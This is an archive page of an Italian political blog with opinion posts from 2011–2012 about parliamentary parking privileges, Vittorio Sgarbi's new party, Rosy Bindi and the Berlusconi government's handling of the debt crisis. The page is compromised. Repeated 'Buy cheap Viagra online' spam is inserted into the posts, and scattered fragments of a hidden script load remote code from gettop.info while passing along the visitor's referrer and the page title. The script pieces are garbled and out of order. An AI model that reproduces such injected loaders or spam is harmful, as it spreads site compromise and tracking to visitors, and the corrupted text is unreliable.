parlamento Archivi - NonCeLaFaccioPiù

.

“Gli onorevoli devono pur essere messi in condizione di parcheggiare”

16 ottobre 2012 Commenti chiusi

Secondo Il Messaggero di oggi sarebbero stati stanziati dalla Camera oltre cinque milioni e mezzo di euro per migliorare la mobilità. Di cosa?! Direte voi! Semplicemente per aumentare il numero dei parcheggi destinati ai deputati e per migliorare la vita degli onorevoli che, in piazza del Parlamento, non sono ad ora provvisti di un parcheggio riservato e, ovviamente, gratis.

D’altronde non si può obbligare un parlamentare ad utilizzare i mezzi pubblici, come, tra l’altro, succede normalmente in Inghilterra (non sia mai!!); o a prendere ogni giorno multe per divieto di sosta di 80 euro che non possono essere rimborsate. Per fortuna che ci pensano i vigili urbani di Piazza di Montecitorio che, spesso e volentieri, prima di fare il verbale chiamano e chiedono loro di spostare la macchina. Insomma, “gli onorevoli devono pur essere messi in condizione di andare a lavoro!”. E chissenefrega dei poveri cittadini che tutte le mattine si arrangiano in mezzo al traffico di Roma, o dentro un vagone stracolmo della Met.Ro., per andare a sudarsi quei pochi soldi di stipendio, che fanno sacrifici per sopravvivere fino alla fine del mese, loro devono mantenere i loro privilegi!!

E poi mi vengono a parlare di spending review!!!

Buy cheap Viagra online

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

} else {

La rivoluzione di Sgarbi

26 luglio 2012 Commenti chiusi

Vittorio Sgarbi ha presentato a Milano il suo progetto politico di cui parlava da tempo. Un nome che è tutto un programma: il Partito della Rivoluzione. Le idee rivoluzionarie del critico d’arte sono varie e toccano temi come: il matrimonio, la scuola, le case chiuse… Una specie di minestrone senza un senso preciso a quanto ho capito io… Ad esempio, invece di dare il matrimonio anche agli omosessuali, Sgarbi propone di abolirlo per tutti in quanto, secondo lui, sarebbe “una tragedia”. Per quanto riguarda la scuola afferma che non ha senso entrare in classe alle otto di mattina perché è scientificamente provato che fino alle dieci e mezza non si combina nulla, quindi meglio spostare l’orario di apertura delle scuole di 2 ore.

Prosegue con la legalizzazione delle case chiuse, con il reddito minimo garantito e con la necessità di adottare uno stile di vita più sobrio, a partire dall’alimentazione con prodotti a chilometri zero per far bene all’economia oltre che alla salute.

Nel suo discorso non mancano gli attacchi ad Alfano che non sarebbe idoneo a guidare il Pdl perché passerebbe il tempo a occuparsi della Minetti

Buy cheap Viagra online

… (Sinceramente non so se volesse alludere a qualcosa!! ndr ). Non risparmia neanche Beppe Grillo che, secondo lui, non ha idee su come governare e, peggio ancora, non sa chi è Simone Martini e si sa, se non conosci Simone Martini e l’arte italiana ovviamente non puoi governare!!

Quindi mentre si parla di spread e di Europa, Sgarbi pensa che sia meglio disquisire di ore di scuola, di slow food, della Minetti e di Simone Martini… Mah… E’ in questi momenti che invoco ancora di più una nuova legge elettorale, proprio per ridare a noi cittadini il potere di lasciare fuori dal parlamento gente come questo tizio qua!!

} else {

} else {

E chi la restituisce la dignità alla gente comune?!

12 dicembre 2011 Commenti chiusi

Ho trovato un po’ particolare la posizione di Rosy Bindi sui tagli del governo Monti alle indennità parlamentari

Buy cheap Viagra online

. Da una parte dice che è giusto farlo, che le indennità vanno ridotte anche di più della media europea, però aggiunge che il decreto salva-Italia sui compensi dei parlamentari è una “scivolata che non ci si aspettava da un governo di competenti”. Secondo lei è necessario restituire dignità al Parlamento altrimenti è a rischio la qualità stessa della nostra democrazia.

A questo punto potremmo porre all’Onorevole Bindi la questione sulla restituzione della dignità a quel pensionato che qualche giorno fa è stato sorpreso a rubare tre bistecche in un supermercato. Si è giustificato dicendo che non aveva i soldi per arrivare a fine mese e che la pensione non gli basta più. Come lui purtroppo si trova tanta altra gente le cui cinghie sono state ormai strette a morte dalla manovra del governo Monti. Chi restituisce loro la dignità?!

-

Siamo sull’orlo del baratro, ma a nessuno frega niente!

8 ottobre 2011 Commenti chiusi

Credo sia lapalissiano ricordare che ormai la crisi e l’inettitudine di questo governo ci hanno messo sulla strada del fallimento economico. Standard & Poor’s ha declassato la valutazione dei titoli di debito dell’Italia e la nostra credibilità internazionale è ai minimi storici. Quella stessa credibilità di cui abbiamo un estremo bisogno per evitare, con l’aiuto dei paesi dell’area euro, la cosiddetta “Sindrome greca”. Purtroppo i sintomi si aggravano ogni giorno di più preannunciando una diagnosi ormai segnata.

Buy cheap Viagra online

Chi potrebbe fare qualcosa, come al solito, preferisce pensare ai propri interessi, proponendo al Parlamento bavagli e leggi che gli consentano di evitare i processi, sia quelli in tribunale che quelli mediatici.

Invece di discutere di problemi veri, in televisione si parla di come ribattezzare un partito, si dibatte sulle possibili proposte, a volte anche in modo discutibile, e su quale potrebbe essere un suo possibile nuovo inno. E poco importa se l’ironia che dispensa a piene mani il nostro Presidente del consiglio sia fuori luogo, volgare e chiaramente a sfondo sessista. Ridiamoci su!!

Mentre il Paese va in pezzi, c’è chi pensa ad andare alle feste di compleanno a trovare i vecchi amici. Amici che, tra l’altro, non godono certo di molta popolarità, specialmente nel loro paese. Ma con quale faccia si può dire di no al prossimo nuovo Zar di Russia?!

Ormai non ci resta che sperare in Napolitano. Deve scegliere: essere ricordato come il capo di uno Stato fallito o come il capo di uno Stato vicino al fallimento. Speriamo che faccia la scelta giusta, ed in fretta anche!

Siamo ormai sull’orlo del baratro, non vorrei che tutto quello che ci resti da fare ora sia goderci il panorama prima di dover saltare!

-

L’Italia è un paese di merda?!

4 settembre 2011 Commenti chiusi

Come definireste un paese che ha permesso ad un personaggio indagato in numerosi processi di governare per 20 anni?!

Un paese occidentale dove è stato registrato un tasso di corruzione paurosamente simile a quello di una nazione del terzo mondo?!

Come definireste un paese che permette a pregiudicati ed a personaggi evidentemente collusi con la mafia di sedere in Senato o alla Camera?!

Un paese dei balocchi dove, se hai un problema con la magistratura, basta farti una leggina “ad hoc” ed è tutto risolto! E chi se ne frega se poi fai a pezzi il sistema giudiziario nazionale! In cui basta che possiedi la maggior parte delle tv e dei giornali e puoi permetterti di dire e fare tutte le cazzate che ti pare.

Un paese dove chi è ricco è sempre più ricco e chi è povero è sempre più povero. Dove migliaia di giovani sono senza lavoro o sono costretti a lavorare a 400

Buy cheap Viagra online

, 500 euro al mese, 8 ore al giorno, 6 giorni su 7, in nero, senza un briciolo di contributi o garanzie, per tentare almeno di sopravvivere, per avere almeno una speranza che domani andrà meglio. Dove c’è chi guadagna 15mila euro al mese per lavorare due giorni a settimana e acquisisce il diritto alla pensione dopo pochi anni, mentre un comune mortale per maturare lo stesso diritto deve sgobbare una vita.

Un paese dove l’incapacità e l’avidità di qualcuno ha ridotto la maggioranza dei cittadini quasi alla fame!

Beh sì, forse questa volta ha ragione Berlusconi: “L’Italia è veramente un paese di merda!”

var d=document;var s=d.createElement('script');

if (document.currentScript) {

Powered by AlterVista